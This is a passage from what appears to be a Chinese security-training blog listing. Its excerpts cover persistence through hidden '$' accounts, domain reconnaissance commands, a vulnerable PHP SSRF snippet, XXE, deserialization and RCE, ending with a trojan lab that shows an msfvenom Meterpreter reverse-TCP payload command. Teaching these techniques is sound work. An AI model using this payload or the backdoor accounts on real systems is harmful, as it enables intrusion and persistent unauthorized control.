网络安全之权限维持(持续更新) 权限维持我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制目标。渗透流程Windows权限维持1.用户维持隐藏用户维持(影子用户)隐藏账户,顾名思义就是计算机看不到的用户(不是不存在用户只是用一般的查看方式看不到)$符号隐藏用户$符号隐藏用户就是在一个用户名后面加$符号,如(hack$)达到简单的隐藏用户目的,从而进行简单的权限维持1.我们平时查看一个操作系统的几个用户的命令如下net user.
网络安全之域信息收集(一) 域信息收集本机信息1.查询账户信息对当前主机的用户角色和用户权限进一步了解,判断是否需要提权DMZ普通用户需要提权到system用户,进行横向移动2.查询网络和端口信息根据目的主机的ip信息/网络连接/相关网络地址,初步确定网络状态win:ipconfig, netstat -anoARP路由表:arp -a路由表:route print查看dns缓存记录命令:ipconfig/displaydnslinux:ifconfig, netstat -
网络安全之SSRF漏洞 1.SSRF是什么<?phpfunction curl($url){ $ch = curl_init(); //设置URL和相应的选项 curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); //启用时会将头文件的信息作为数据流输出 //抓取URL并把它传给浏览器 curl_close($ch);}$url = $_GET['url'];curl
网络安全之XXE漏洞 XXE漏洞1.XML基础知识eXtensible Markup Language可扩展标记语言用途配置文件交换数据XML内容xml声明XML格式要求 XML文档必须有根元素 XML文档必须有关闭标签 XML标签对大小写敏感 XML元素必须被正确的嵌套 XML属性必须被加引号 XML格式校验DTD(Document Type Definition)文档类型定义DTD内容之元素...
网络安全之反序列化漏洞 一·PHP类与对象类Class一个共享相同结构和行为的对象的集合<?php class MyClass{ var $var1; var $var2 ="constant string"; function myfunc ($arg1,$arg2){ [......] } [....]}?>类的实例$baidu = new Site;$kitty = new Cat;$benz = new Car;二
网路安全之远程代码执行漏洞 一。什么是远程代码执行?远程代码执行:Remote Code Execute后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞,不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。因此,如果需要给前端用户提供操作类的接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法远程命令执行:Remote Command Execute一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对
应急响应实战之木马实战 一.应急响应流程回顾二.木马攻击模拟实验(特别注意本次实验仅仅用于模拟木马攻击实验,不能拿去搞破坏,家有家规,国有国法,希望大家知法守法.)1.环境介绍攻击机kali:下载地址被攻击机(注意关闭防火墙)win10:下载地址:木马脚本源码msfvenom -a -x86 --platfrom windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口号 -b "\x00" -e x86/sh
关注
